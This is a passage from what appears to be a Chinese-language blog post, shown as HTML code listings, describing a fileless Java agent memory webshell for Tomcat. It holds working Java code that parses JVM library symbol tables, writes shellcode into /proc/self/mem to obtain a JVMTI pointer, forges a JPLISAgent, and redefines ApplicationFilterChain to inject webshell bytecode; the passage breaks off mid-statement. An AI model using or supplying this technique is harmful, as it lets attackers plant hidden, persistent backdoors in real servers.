class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br></pre></td><td class="code"><pre><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">long</span> <span class="title function_">readElf</span><span class="params">(String libName,String sym,Long baseAddr)</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">        <span class="type">Properties</span> <span class="variable">properties</span> <span class="operator">=</span> System.getProperties();</span><br><span class="line">        <span class="type">String</span> <span class="variable">libPath</span> <span class="operator">=</span> properties.getProperty(<span class="string">&quot;sun.boot.library.path&quot;</span>);</span><br><span class="line">        String path=libPath+libName;</span><br><span class="line">        RandomAccessFile fin=<span class="keyword">new</span> <span class="title class_">RandomAccessFile</span>(path,<span class="string">&quot;r&quot;</span>);</span><br><span class="line">        <span class="comment">//解析 elf File Header</span></span><br><span class="line"><span class="comment">//        typedef struct</span></span><br><span class="line"><span class="comment">//        &#123;</span></span><br><span class="line"><span class="comment">//            unsigned char	e_ident[EI_NIDENT];	/* Magic number and other info */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_type;			/* Object file type */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_machine;		/* Architecture */</span></span><br><span class="line"><span class="comment">//            Elf64_Word	e_version;		/* Object file version */</span></span><br><span class="line"><span class="comment">//            Elf64_Addr	e_entry;		/* Entry point virtual address */</span></span><br><span class="line"><span class="comment">//            Elf64_Off	e_phoff;		/* Program header table file offset */</span></span><br><span class="line"><span class="comment">//            Elf64_Off	e_shoff;		/* Section header table file offset */</span></span><br><span class="line"><span class="comment">//            Elf64_Word	e_flags;		/* Processor-specific flags */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_ehsize;		/* ELF header size in bytes */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_phentsize;		/* Program header table entry size */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_phnum;		/* Program header table entry count */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_shentsize;		/* Section header table entry size */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_shnum;		/* Section header table entry count */</span></span><br><span class="line"><span class="comment">//            Elf64_Half	e_shstrndx;		/* Section header string table index */</span></span><br><span class="line"><span class="comment">//        &#125; Elf64_Ehdr;</span></span><br><span class="line">        System.out.println(<span class="string">&quot;------------------------------------------elf File Header\n------------------------------------------&quot;</span>);</span><br><span class="line">        <span class="type">byte</span>[] e_ident=<span class="keyword">new</span> <span class="title class_">byte</span>[<span class="number">16</span>];</span><br><span class="line">        fin.read(e_ident);</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_type</span> <span class="operator">=</span> Short.reverseBytes(fin.readShort());</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_machine</span> <span class="operator">=</span> Short.reverseBytes(fin.readShort());</span><br><span class="line">        <span class="type">int</span> <span class="variable">e_version</span> <span class="operator">=</span> Integer.reverseBytes(fin.readInt());</span><br><span class="line">        <span class="type">long</span> <span class="variable">e_entry</span> <span class="operator">=</span> Long.reverseBytes(fin.readLong());</span><br><span class="line">        <span class="type">long</span> <span class="variable">e_phoff</span> <span class="operator">=</span> Long.reverseBytes(fin.readLong());</span><br><span class="line">        <span class="type">long</span> <span class="variable">e_shoff</span> <span class="operator">=</span> Long.reverseBytes(fin.readLong());</span><br><span class="line">        <span class="type">int</span> <span class="variable">e_flags</span> <span class="operator">=</span> Integer.reverseBytes(fin.readInt());</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_ehsize</span> <span class="operator">=</span> Short.reverseBytes(fin.readShort());</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_phentsize</span> <span class="operator">=</span> Short.reverseBytes(fin.readShort());</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_phnum</span> <span class="operator">=</span> Short.reverseBytes(fin.readShort());</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_shentsize</span> <span class="operator">=</span> Short.reverseBytes(fin.readShort());</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_shnum</span> <span class="operator">=</span>Short.reverseBytes(fin.readShort());</span><br><span class="line">        <span class="type">short</span> <span class="variable">e_shstrndx</span> <span class="operator">=</span> Short.reverseBytes(fin.readShort());</span><br><span class="line">        System.out.println(<span class="string">&quot;------------------------------------------elf File Header End\n------------------------------------------&quot;</span>);</span><br><span class="line"></span><br><span class="line">        System.out.println(<span class="string">&quot;e_shoff:0x&quot;</span>+Long.toHexString(e_shoff));</span><br><span class="line"></span><br><span class="line">        <span class="comment">//解析Section Header Table</span></span><br><span class="line">        <span class="type">int</span> sh_name=<span class="number">0</span>;</span><br><span class="line">        <span class="type">int</span> sh_type=<span class="number">0</span>;</span><br><span class="line">        <span class="type">long</span> sh_flags=<span class="number">0</span>;</span><br><span class="line">        <span class="type">long</span> sh_addr=<span class="number">0</span>;</span><br><span class="line">        <span class="type">long</span> sh_offset=<span class="number">0</span>;</span><br><span class="line">        <span class="type">long</span> sh_size=<span class="number">0</span>;</span><br><span class="line">        <span class="type">int</span> sh_link=<span class="number">0</span>;</span><br><span class="line">        <span class="type">int</span> sh_info=<span class="number">0</span>;</span><br><span class="line">        <span class="type">long</span> sh_addralign=<span class="number">0</span>;</span><br><span class="line">        <span class="type">long</span> sh_entsize=<span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">        System.out.println(<span class="string">&quot;e_shnum:&quot;</span>+e_shnum);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">0</span>;i&lt;e_shnum;i++)&#123;</span><br><span class="line">            <span class="comment">//每个Secton Header 64个字节</span></span><br><span class="line">            <span class="comment">//找到SHT_DYNSYM类型的Section Table，即动态链接库的符号表，sh_type=11</span></span><br><span class="line"><span class="comment">//            typedef struct</span></span><br><span class="line"><span class="comment">//            &#123;</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_name;		/* Section name (string tbl index) */</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_type;		/* Section type */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_flags;		/* Section flags */</span></span><br><span class="line"><span class="comment">//                Elf64_Addr	sh_addr;		/* Section virtual addr at execution */</span></span><br><span class="line"><span class="comment">//                Elf64_Off	sh_offset;		/* Section file offset */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_size;		/* Section size in bytes */</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_link;		/* Link to another section */</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_info;		/* Additional section information */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_addralign;		/* Section alignment */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_entsize;		/* Entry size if section holds table */</span></span><br><span class="line"><span class="comment">//            &#125; Elf64_Shdr;</span></span><br><span class="line">            fin.seek(e_shoff+i*<span class="number">64</span>);</span><br><span class="line">            sh_name = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_type = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_flags = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_addr = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_offset = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_size = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_link = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_info = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_addralign = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_entsize = Long.reverseBytes(fin.readLong());</span><br><span class="line">            <span class="keyword">if</span> (sh_type == <span class="number">11</span>) <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">long</span> <span class="variable">dynsym_sh_offset</span> <span class="operator">=</span> sh_offset;</span><br><span class="line">        <span class="type">long</span> <span class="variable">dynsym_sh_size</span> <span class="operator">=</span> sh_size;</span><br><span class="line">        <span class="type">long</span> dynsym_sh_entsize= sh_entsize;</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">0</span>;i&lt;e_shnum;i++)&#123;</span><br><span class="line">            <span class="comment">//每个Secton Header 64个字节</span></span><br><span class="line">            <span class="comment">//找到SHT_STRTAB类型的Section Table，即动态链接库的符号表 sh_type=3</span></span><br><span class="line"><span class="comment">//            typedef struct</span></span><br><span class="line"><span class="comment">//            &#123;</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_name;		/* Section name (string tbl index) */</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_type;		/* Section type */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_flags;		/* Section flags */</span></span><br><span class="line"><span class="comment">//                Elf64_Addr	sh_addr;		/* Section virtual addr at execution */</span></span><br><span class="line"><span class="comment">//                Elf64_Off	sh_offset;		/* Section file offset */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_size;		/* Section size in bytes */</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_link;		/* Link to another section */</span></span><br><span class="line"><span class="comment">//                Elf64_Word	sh_info;		/* Additional section information */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_addralign;		/* Section alignment */</span></span><br><span class="line"><span class="comment">//                Elf64_Xword	sh_entsize;		/* Entry size if section holds table */</span></span><br><span class="line"><span class="comment">//            &#125; Elf64_Shdr;</span></span><br><span class="line">            fin.seek(e_shoff+i*<span class="number">64</span>);</span><br><span class="line">            sh_name = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_type = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_flags = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_addr = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_offset = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_size = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_link = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_info = Integer.reverseBytes(fin.readInt());</span><br><span class="line">            sh_addralign = Long.reverseBytes(fin.readLong());</span><br><span class="line">            sh_entsize = Long.reverseBytes(fin.readLong());</span><br><span class="line">            <span class="keyword">if</span> (sh_type == <span class="number">3</span>) <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        Long str_sh_offset=sh_offset;</span><br><span class="line">        <span class="type">Long</span> <span class="variable">str_sh_size</span> <span class="operator">=</span> sh_size;</span><br><span class="line">        <span class="type">Long</span> <span class="variable">str_sh_entsize</span> <span class="operator">=</span>sh_entsize;</span><br><span class="line">        System.out.println(<span class="string">&quot;dynsym_sh_offset:0x&quot;</span>+Long.toHexString(dynsym_sh_offset));</span><br><span class="line">        System.out.println(<span class="string">&quot;str_sh_offset:0x&quot;</span>+Long.toHexString(str_sh_offset));</span><br><span class="line"></span><br><span class="line">        <span class="comment">//parse Symbol Table</span></span><br><span class="line">        <span class="comment">//遍历Symbol Table，并根据st_name的偏移，去字符串表里搜函数名</span></span><br><span class="line">        <span class="comment">//找到需要的Symbol entry后，返回函数偏移地址+库加载基址</span></span><br><span class="line"><span class="comment">//        typedef struct</span></span><br><span class="line"><span class="comment">//        &#123;</span></span><br><span class="line"><span class="comment">//            Elf64_Word	st_name;		/* Symbol name (string tbl index) */</span></span><br><span class="line"><span class="comment">//            unsigned char	st_info;		/* Symbol type and binding */</span></span><br><span class="line"><span class="comment">//            unsigned char st_other;		/* Symbol visibility */</span></span><br><span class="line"><span class="comment">//            Elf64_Section	st_shndx;		/* Section index */</span></span><br><span class="line"><span class="comment">//            Elf64_Addr	st_value;		/* Symbol value */</span></span><br><span class="line"><span class="comment">//            Elf64_Xword	st_size;		/* Symbol size */</span></span><br><span class="line"><span class="comment">//        &#125; Elf64_Sym;</span></span><br><span class="line">        <span class="type">long</span> count= (dynsym_sh_entsize&gt;<span class="number">0</span>)?(dynsym_sh_size/dynsym_sh_entsize):<span class="number">0</span>;</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">0</span>;i&lt;count;i++)&#123;</span><br><span class="line">            fin.seek(dynsym_sh_offset+i*dynsym_sh_entsize);</span><br><span class="line">            <span class="type">int</span> st_name=Integer.reverseBytes(fin.readInt());</span><br><span class="line">            <span class="type">byte</span> st_info=fin.readByte();</span><br><span class="line">            <span class="type">byte</span> st_other=fin.readByte();</span><br><span class="line">            <span class="type">short</span> st_shndx=Short.reverseBytes(fin.readShort());</span><br><span class="line">            <span class="type">long</span> st_value=Long.reverseBytes(fin.readLong());</span><br><span class="line">            <span class="type">long</span> st_size=Long.reverseBytes(fin.readLong());</span><br><span class="line"></span><br><span class="line">            fin.seek(str_sh_offset+st_name);</span><br><span class="line">            String sym_str=<span class="string">&quot;&quot;</span>;</span><br><span class="line">            <span class="type">byte</span> ch=<span class="number">0</span>;</span><br><span class="line">            <span class="keyword">while</span> ((ch= fin.readByte())!=<span class="number">0</span>)&#123;</span><br><span class="line">                sym_str+=(<span class="type">char</span>)ch;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (sym_str.equals(sym))&#123;</span><br><span class="line">                <span class="keyword">return</span> st_value+baseAddr;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> -<span class="number">1</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<h2 id="填充shellcode，写入内存"><a href="#填充shellcode，写入内存" class="headerlink" title="填充shellcode，写入内存"></a>填充shellcode，写入内存</h2><p>将<code>JNI_GetCreatedJavaVMs</code>函数的地址填到shellcode中，并写入到<code>Java_java_io_RandomAccessFile_length</code>的地址上。<br>手动调用RandomAccessFile.length，触发shellcode。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">		<span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> ManagementFactory.getRuntimeMXBean().getName();</span><br><span class="line">        <span class="type">String</span> <span class="variable">pid</span> <span class="operator">=</span> name.split(<span class="string">&quot;@&quot;</span>)[<span class="number">0</span>];</span><br><span class="line">        System.out.println(<span class="string">&quot;PID:&quot;</span>+pid);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        File file=<span class="keyword">new</span> <span class="title class_">File</span>(<span class="string">&quot;/proc/self/maps&quot;</span>);</span><br><span class="line">        <span class="type">FileReader</span> <span class="variable">fr</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">FileReader</span>(file);</span><br><span class="line">        <span class="type">BufferedReader</span> <span class="variable">br</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedReader</span>(fr);</span><br><span class="line">        String line=<span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="type">long</span> libjava_baseAddr=<span class="number">0</span>;</span><br><span class="line">        <span class="type">long</span> libjvm_baseAddr=<span class="number">0</span>;</span><br><span class="line">        <span class="keyword">while</span> ((line=br.readLine()) !=<span class="literal">null</span>)&#123;</span><br><span class="line">            <span class="keyword">if</span>(line.contains(<span class="string">&quot;libjava&quot;</span>)&amp;&amp;libjava_baseAddr==<span class="number">0</span>)&#123;</span><br><span class="line">                System.out.println(line);</span><br><span class="line">                String str_addr=line.split(<span class="string">&quot;-&quot;</span>)[<span class="number">0</span>];</span><br><span class="line">                libjava_baseAddr=Long.parseLong(str_addr,<span class="number">16</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(line.contains(<span class="string">&quot;libjvm&quot;</span>)&amp;&amp;libjvm_baseAddr==<span class="number">0</span>)&#123;</span><br><span class="line">                System.out.println(line);</span><br><span class="line">                String str_addr=line.split(<span class="string">&quot;-&quot;</span>)[<span class="number">0</span>];</span><br><span class="line">                libjvm_baseAddr=Long.parseLong(str_addr,<span class="number">16</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span>(libjava_baseAddr!=<span class="number">0</span>&amp;&amp;libjvm_baseAddr!=<span class="number">0</span>)&#123;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="type">long</span> <span class="variable">sym_java</span> <span class="operator">=</span> readElf(<span class="string">&quot;/libjava.so&quot;</span>,<span class="string">&quot;Java_java_io_RandomAccessFile_length&quot;</span>,libjava_baseAddr);</span><br><span class="line">        <span class="type">long</span> <span class="variable">sym_jvm</span> <span class="operator">=</span> readElf(<span class="string">&quot;/server/libjvm.so&quot;</span>,<span class="string">&quot;JNI_GetCreatedJavaVMs&quot;</span>,libjvm_baseAddr);</span><br><span class="line">        System.out.println(<span class="string">&quot;sym_java:&quot;</span>+Long.toHexString(sym_java));</span><br><span class="line">        System.out.println(<span class="string">&quot;sym_jvm:&quot;</span>+Long.toHexString(sym_jvm));</span><br><span class="line"></span><br><span class="line">        <span class="type">byte</span> codes[]=<span class="keyword">new</span> <span class="title class_">byte</span>[]&#123;<span class="number">0x55</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x89</span>,(<span class="type">byte</span>)<span class="number">0xe5</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x83</span>,(<span class="type">byte</span>)<span class="number">0xec</span>,<span class="number">0x20</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0xb8</span>&#125;;</span><br><span class="line"></span><br><span class="line">        <span class="type">byte</span> codes2[]=<span class="keyword">new</span> <span class="title class_">byte</span>[]&#123;<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x8d</span>,<span class="number">0x7c</span>,<span class="number">0x24</span>,<span class="number">0x10</span>,(<span class="type">byte</span>)<span class="number">0xbe</span>,<span class="number">0x01</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x00</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x8d</span>,<span class="number">0x54</span>,<span class="number">0x24</span>,<span class="number">0x08</span>,(<span class="type">byte</span>)<span class="number">0xff</span>,(<span class="type">byte</span>)<span class="number">0xd0</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x8b</span>,<span class="number">0x7c</span>,<span class="number">0x24</span>,<span class="number">0x10</span>,(<span class="type">byte</span>)<span class="number">0xba</span>,<span class="number">0x00</span>,<span class="number">0x02</span>,<span class="number">0x01</span>,<span class="number">0x30</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x8d</span>,<span class="number">0x74</span>,<span class="number">0x24</span>,<span class="number">0x08</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x8b</span>,<span class="number">0x07</span>,(<span class="type">byte</span>)<span class="number">0xff</span>,<span class="number">0x50</span>,<span class="number">0x30</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x8b</span>,<span class="number">0x44</span>,<span class="number">0x24</span>,<span class="number">0x08</span>,<span class="number">0x48</span>,(<span class="type">byte</span>)<span class="number">0x83</span>,(<span class="type">byte</span>)<span class="number">0xc4</span>,<span class="number">0x20</span>,<span class="number">0x5d</span>,(<span class="type">byte</span>)<span class="number">0xc3</span>&#125;;</span><br><span class="line"></span><br><span class="line">        String sym_jvm_str=Long.toHexString(sym_jvm);</span><br><span class="line">        <span class="type">byte</span> sym_jvm_addr[] = <span class="keyword">new</span> <span class="title class_">byte</span>[sym_jvm_str.length()/<span class="number">2</span>];</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i=sym_jvm_str.length()-<span class="number">2</span>;i&gt;=<span class="number">0</span>;i-=<span class="number">2</span>)&#123;</span><br><span class="line">            System.out.println(sym_jvm_str.substring(i,i+<span class="number">2</span>));</span><br><span class="line">            sym_jvm_addr[(sym_jvm_addr.length-i/<span class="number">2</span>)-<span class="number">1</span>]= (<span class="type">byte</span>) Integer.parseInt(sym_jvm_str.substring(i,i+<span class="number">2</span>),<span class="number">16</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">byte</span> shellcode[]=<span class="keyword">new</span> <span class="title class_">byte</span>[codes.length+codes2.length+<span class="number">8</span>];</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">0</span>;i&lt;codes.length;i++)&#123;</span><br><span class="line">            shellcode[i]=codes[i];</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">0</span>;i&lt;sym_jvm_addr.length;i++)&#123;</span><br><span class="line">            shellcode[i+codes.length]=sym_jvm_addr[i];</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span>(sym_jvm_addr.length&lt;<span class="number">8</span>)&#123;</span><br><span class="line">            <span class="keyword">for</span>(<span class="type">int</span> i=<span class="number">0</span>;i&lt;(<span class="number">8</span>-sym_jvm_addr.length);i++)&#123;</span><br><span class="line">                shellcode[i+codes.length+sym_jvm_addr.length]=<span class="number">0x00</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">0</span>;i&lt;codes2.length;i++)&#123;</span><br><span class="line">            shellcode[i+codes.length+<span class="number">8</span>]=codes2[i];</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//        System.out.println(&quot;sym_jvm:&quot;+sym_jvm_str);</span></span><br><span class="line">        <span class="keyword">for</span>(<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; shellcode.length; ++i)&#123;</span><br><span class="line">            System.out.printf(<span class="string">&quot;0x%02x &quot;</span>, shellcode[i]);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="type">RandomAccessFile</span> <span class="variable">fin</span> <span class="operator">=</span><span class="keyword">new</span> <span class="title class_">RandomAccessFile</span>(<span class="string">&quot;/proc/self/mem&quot;</span>,<span class="string">&quot;rw&quot;</span>);</span><br><span class="line">        fin.seek(sym_java);</span><br><span class="line">        fin.write(shellcode);</span><br><span class="line">        fin.close();</span><br><span class="line"><span class="comment">//        debug_show(sym_java,100);</span></span><br><span class="line">        fin =<span class="keyword">new</span> <span class="title class_">RandomAccessFile</span>(<span class="string">&quot;/proc/self/mem&quot;</span>,<span class="string">&quot;rw&quot;</span>);</span><br><span class="line">        <span class="type">long</span> env= fin.length();</span><br></pre></td></tr></table></figure>

<p>调试一下,可以看到Java_java_io_RandomAccessFile_length函数的指令，已经替换成了写入的shellcode，正常执行后，返回了jvmtienv指针。<br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/98dc9bb6e3cb7779388e56d0465be1d8.png"><br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/53755bc83f23ade92edd6d5d8b0b0604.png"></p>
<h2 id="伪造JPLISAgent"><a href="#伪造JPLISAgent" class="headerlink" title="伪造JPLISAgent"></a>伪造JPLISAgent</h2><p>使用Unsafe申请一段内存，在偏移为8的位置放置jvmtienv指针。其他的属性就不管了，因为没用到。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">Unsafe unsafe=<span class="literal">null</span>;</span><br><span class="line"><span class="keyword">try</span> &#123;</span><br><span class="line">    Class&lt;?&gt; unsafeClazz = Class.forName(<span class="string">&quot;sun.misc.Unsafe&quot;</span>);</span><br><span class="line">    Field field=unsafeClazz.getDeclaredField(<span class="string">&quot;theUnsafe&quot;</span>);</span><br><span class="line">    field.setAccessible(<span class="literal">true</span>);</span><br><span class="line">    unsafe=(Unsafe)field.get(<span class="literal">null</span>);</span><br><span class="line">&#125;<span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">    e.printStackTrace();</span><br><span class="line">&#125;</span><br><span class="line">Long JPLISAgent= unsafe.allocateMemory(<span class="number">0x1000</span>);</span><br><span class="line">unsafe.putLong(JPLISAgent+<span class="number">8</span>,env);</span><br></pre></td></tr></table></figure>

<h2 id="注入webshell"><a href="#注入webshell" class="headerlink" title="注入webshell"></a>注入webshell</h2><p>反射创建一个InstrumentationImpl的实例，传入获取的指针。<br>查到要修改的class后，反射调用redefineClasses，写入提前准备好的字节码。<br>字节码可以在本地先用agent.jar打一个，然后dump下来，这里优先用低版本jdk环境，目标环境的java会向下兼容，避免字节码版本太高，跑不起来。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">    Class&lt;?&gt; instrument_clz = Class.forName(<span class="string">&quot;sun.instrument.InstrumentationImpl&quot;</span>);</span><br><span class="line">    Constructor&lt;?&gt; constructor = instrument_clz.getDeclaredConstructor(<span class="type">long</span>.class,<span class="type">boolean</span>.class,<span class="type">boolean</span>.class);</span><br><span class="line">    constructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">    sun.instrument.<span class="type">InstrumentationImpl</span> <span class="variable">insn</span> <span class="operator">=</span> (sun.instrument.InstrumentationImpl)constructor.newInstance(JPLISAgent,<span class="literal">true</span>,<span class="literal">false</span>);</span><br><span class="line">    <span class="type">Method</span> <span class="variable">getAllLoadedClasses</span> <span class="operator">=</span> instrument_clz.getMethod(<span class="string">&quot;getAllLoadedClasses&quot;</span>);</span><br><span class="line">    Class&lt;?&gt;[] classes =(Class&lt;?&gt;[]) getAllLoadedClasses.invoke(insn);</span><br><span class="line">    <span class="type">String</span> <span class="variable">className</span> <span class="operator">=</span> <span class="string">&quot;org.apache.catalina.core.ApplicationFilterChain&quot;</span>;</span><br><span class="line">    <span class="keyword">for</span>(Class&lt;?&gt; cls : classes) &#123;</span><br><span class="line">        <span class="keyword">if</span>(cls.getName().equals(className))&#123;</span><br><span class="line">            String webshell_b64=<span class="string">&quot;&quot;</span>;</span><br><span class="line">            ClassDefinition classDefinition=<span class="keyword">new</span> <span class="title class_">ClassDefinition</span>(cls, Base64.getDecoder().decode(webshell_b64));</span><br><span class="line">            Method redefineClasses_method=insn.getClass().getMethod(<span 